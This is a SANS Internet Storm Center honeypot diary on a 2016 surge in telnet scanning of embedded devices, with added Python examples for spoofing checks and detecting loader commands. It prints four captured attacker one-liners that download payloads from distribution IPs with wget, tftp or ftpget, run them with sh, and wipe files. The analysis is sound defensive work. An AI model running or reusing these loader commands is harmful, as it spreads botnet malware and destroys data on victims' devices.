SANS ISC: Internet Storm Center


Increase in Port 23 (telnet) scanning

Published: 2016-05-31
Last Updated: 2016-05-31 21:17:49 UTC
by Johannes Ullrich (Version: 1)

Update: I extracted a sample pcap; the target (honeypot) IP has been replaced. The odd thing about these connections is that they are not only all "blind", but that they don't really send a password either. Also, according to my version of Wireshark, the telnet traffic is initially malformed. Maybe a telnet exploit? Click here for the pcap file.

Some readers noted that over the weekend, port 23 scans were up significantly. A quick look at our honeypot doesn't show anything significantly different, other than the well-known fact that if you run a telnet server with a default password, you are probably already compromised.

Typically, a sharp increase in the number of distinct source IPs (rather than just in packet volume from a few sources) indicates some type of worm: each newly infected system starts scanning for further victims, so the source count grows with the infection.

The main targets of telnet scans are usually embedded devices. The attack follows a pretty simple pattern:

  1. Brute-force the password (usually a well-known default password).
  2. Download additional malware via FTP, HTTP or TFTP (typically multiple binaries, one per CPU architecture, since the attacker does not know in advance what the device runs).
  3. Run the malware, which will typically set up a client for a DDoS botnet.

The malware is very ephemeral; the distribution point is often already shut down by the time the scan reaches our honeypot. Here are a couple of results from our honeypot, and a few tricks for dealing with large amounts of data in pcap files.

The first question is: is this traffic spoofed? As a visual check, we compare the before and after distribution of source IPs by /8 network. The image shows some deviations, but overall the two graphs track each other, and there are no large discrepancies in RFC1918 networks or other obviously spoofed (bogon) address space, which is what randomly spoofed sources would produce.
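The same before/after comparison can be done numerically rather than by eye. The following is an added example (not part of the diary, and not ISC tooling): it buckets source IPs by /8, reports the change in each /8's share of the traffic, and lists sources that fall in non-routable space (RFC1918, loopback, link-local, CGNAT, reserved) as a spoofing indicator. The two IP lists are constructed sample data, not honeypot output; a real run would feed it the source columns of `tshark -T fields -e ip.src` from the before and after captures.

```python
"""Before/after source-IP distribution check by /8, as a spoofing sanity test.

Added example (not part of the ISC diary). BEFORE and AFTER are constructed
sample source-IP lists, not honeypot data.
"""
import ipaddress
from collections import Counter

# Constructed sample data (hypothetical): sources seen before and after the increase.
BEFORE = [
    "61.1.2.3", "61.9.8.7", "117.4.5.6", "186.20.30.40", "186.21.31.41",
    "202.5.6.7", "202.8.9.10", "36.1.1.1", "59.2.2.2", "91.3.3.3",
]
AFTER = [
    "61.1.2.9", "61.9.8.1", "117.4.5.2", "186.20.30.1", "186.21.31.2",
    "202.5.6.3", "202.8.9.4", "36.1.1.5", "59.2.2.6", "59.3.3.7",
    "10.0.0.1",  # RFC1918 source: should never arrive from the Internet unspoofed
]


def bucket_by_slash8(ips):
    """Count sources per /8 (keyed by first octet)."""
    counts = Counter()
    for ip in ips:
        counts[int(ipaddress.ip_address(ip)) >> 24] += 1
    return counts


def share(counts):
    """Convert per-/8 counts into fractions of the total."""
    total = sum(counts.values())
    return {k: v / total for k, v in counts.items()}


def bogon_sources(ips):
    """Sources in non-global space: RFC1918, loopback, link-local, CGNAT, reserved, etc.

    is_global() does not know about unallocated but technically global ranges,
    so this is a lower bound on spoofed sources, not a complete bogon list.
    """
    return [ip for ip in ips if not ipaddress.ip_address(ip).is_global]


def slash8_deviation(before, after):
    """Return {first_octet: share_after - share_before}, largest |delta| first.

    Roughly flat deltas mean the new traffic has the same /8 mix as the old,
    which is what a worm spreading through real hosts looks like; a few /8s
    jumping (or bogon space appearing) points at spoofing or a single source.
    """
    sb, sa = share(bucket_by_slash8(before)), share(bucket_by_slash8(after))
    delta = {k: sa.get(k, 0.0) - sb.get(k, 0.0) for k in set(sb) | set(sa)}
    return dict(sorted(delta.items(), key=lambda kv: -abs(kv[1])))


if __name__ == "__main__":
    print("bogons after:", bogon_sources(AFTER))
    for octet, d in slash8_deviation(BEFORE, AFTER).items():
        print(f"{octet:>3}/8  {d:+.3f}")
```

On real captures the interesting output is the tail of the deviation list that is not near zero, plus any non-empty bogon list; the author's conclusion that the traffic is not spoofed corresponds to small deltas and no bogons.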

For the honeypot, I set up tcpdump to write 100MB pcap files (tcpdump -w /tmp/telnet -C100 port 23; the -C value is in millions of bytes, and tcpdump starts a new file with a numeric suffix each time the current one reaches that size). On this very busy honeypot (it covers several thousand IPs), it took about 15 minutes to fill 100MB.

Next, let's take a look at the telnet payloads with tshark:

tshark -r telnet -n -Y ' && tcp.len>1' -T fields -e | sort | uniq -c | sort -n

(The display-filter term before "&&" and the field name after "-e" did not survive on this page; for telnet payloads they would normally be the "telnet" protocol filter and the "telnet.data" field. "tcp.len>1" drops the one-byte segments from option negotiation and character-at-a-time echo, leaving the command strings, which "sort | uniq -c | sort -n" then ranks by frequency.)

Here are some of the top commands (the distribution IPs are defanged with a space):

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/; chmod 777; sh; tftp 93. 186.254.152 -c get; chmod 777; sh; tftp -r -g 93. 186.254.152; chmod 777; sh; rm -rf


cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://149 .56.110.173/;sh;busybox tftp -r -g 149 .56.110.173;sh;busybox tftp 149 .56.110.173 -c get;sh;busybox ftpget 149 .56.110.173;sh;exit


cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/; chmod 777; sh; tftp 192 .227.221.223 -c get; chmod 777; sh; tftp -r -g 192 .227.221.223; chmod 777; sh; ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223; sh; rm -rf; rm -rf *;


cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208 .67.1.114/;sh;busybox tftp -r -g 208 .67.1.114;sh;busybox tftp 208 .67.1.114 -c get;sh;busybox ftpget 208 .67.1.114;sh;exit


As you can see, they all follow the standard "pattern": change into a writable directory (/tmp, /var/run, /dev/shm, /mnt, ...), try each download method the device might have (wget, tftp, ftpget, with or without a busybox prefix), execute whatever was fetched with sh, then clean up.
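The three-step pattern described earlier and the four commands above are regular enough to parse. The following is an added example (my code, not the diary's or ISC's tooling) that takes the post-login command strings, undoes the space-based defanging used on this page, and pulls out the staging directories, the download tools tried, and the distribution IPs, plus a simple detection rule (cd into a staging directory, a fetch, then sh) that can be run over the tshark output. COMMANDS holds the four commands from the diary verbatim; the benign commands in the test are constructed.

```python
"""Extract indicators from the post-login telnet command strings.

Added example, not the diary's own tooling. COMMANDS holds the four commands
printed in the diary, with the author's defanging kept (a space next to one
of the dots in every IP); refang() reverses that so the IPs can be validated.
"""
import ipaddress
import re

COMMANDS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/; chmod 777; sh; tftp 93. 186.254.152 -c get; chmod 777; sh; tftp -r -g 93. 186.254.152; chmod 777; sh; rm -rf",
    "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://149 .56.110.173/;sh;busybox tftp -r -g 149 .56.110.173;sh;busybox tftp 149 .56.110.173 -c get;sh;busybox ftpget 149 .56.110.173;sh;exit",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/; chmod 777; sh; tftp 192 .227.221.223 -c get; chmod 777; sh; tftp -r -g 192 .227.221.223; chmod 777; sh; ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223; sh; rm -rf; rm -rf *;",
    "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208 .67.1.114/;sh;busybox tftp -r -g 208 .67.1.114;sh;busybox tftp 208 .67.1.114 -c get;sh;busybox ftpget 208 .67.1.114;sh;exit",
]

# Dotted quad, tolerating one space on either side of any dot (the defanging above).
IP_RE = re.compile(r"(?<!\d)(\d{1,3}) ?\. ?(\d{1,3}) ?\. ?(\d{1,3}) ?\. ?(\d{1,3})(?!\d)")
# Download tools these loaders try in turn; a leading "busybox" is stripped first.
FETCHERS = {"wget", "tftp", "ftpget", "curl"}
# Directories the loaders cd into: writable on most embedded Linux builds.
STAGING_DIRS = {"/tmp", "/var/run", "/dev/shm", "/mnt", "/var", "/root", "/"}


def refang(match):
    """Turn a (possibly defanged) regex match back into a dotted quad, or None if invalid."""
    quad = ".".join(match.groups())
    try:
        return str(ipaddress.IPv4Address(quad))
    except ValueError:
        return None


def segments(cmd):
    """Split a shell one-liner on ; | || & && into stripped, non-empty segments."""
    return [s.strip() for s in re.split(r"[;|&]+", cmd) if s.strip()]


def parse_command(cmd):
    """Staging dirs, fetch tools, distribution IPs and busybox use for one loader string."""
    segs = segments(cmd)
    staging, fetchers = [], []
    for s in segs:
        words = s.split()
        if words[0] == "busybox" and len(words) > 1:
            words = words[1:]
        if words[0] == "cd" and len(words) > 1:
            staging.append(words[1])
        elif words[0] in FETCHERS and words[0] not in fetchers:
            fetchers.append(words[0])
    ips = sorted({ip for ip in (refang(m) for m in IP_RE.finditer(cmd)) if ip})
    return {
        "staging": staging,
        "fetchers": fetchers,
        "ips": ips,
        "busybox": any(s.startswith("busybox ") for s in segs),
        "runs_payload": "sh" in segs,
    }


def looks_like_loader(cmd):
    """Detection rule: cd into a staging dir, fetch something, then run 'sh' on it."""
    p = parse_command(cmd)
    return bool(set(p["staging"]) & STAGING_DIRS) and bool(p["fetchers"]) and p["runs_payload"]


def distribution_hosts(commands):
    """All distribution-point IPs across a batch of commands, in numeric order."""
    hosts = set()
    for c in commands:
        hosts.update(parse_command(c)["ips"])
    return sorted(hosts, key=ipaddress.IPv4Address)


if __name__ == "__main__":
    for c in COMMANDS:
        print(looks_like_loader(c), parse_command(c))
    print(distribution_hosts(COMMANDS))
```

The distribution_hosts() list is the part worth acting on quickly: as the diary notes these hosts are short-lived, so they are only useful as indicators while the campaign is running. The detection rule deliberately keys on the behaviour (staging directory, fetch, sh) rather than on any IP or filename, since those change from run to run.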

p0f gives us a quick breakdown of the operating systems behind the collected traffic. Pretty much all of the hits come from Linux: out of roughly one million p0f records, fewer than 200 indicate an operating system other than Linux. That is consistent with the scanners themselves being compromised embedded Linux devices rather than, say, a desktop botnet.

So in conclusion: I am not sure what caused the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and don't use default passwords.

Johannes B. Ullrich, Ph.D.
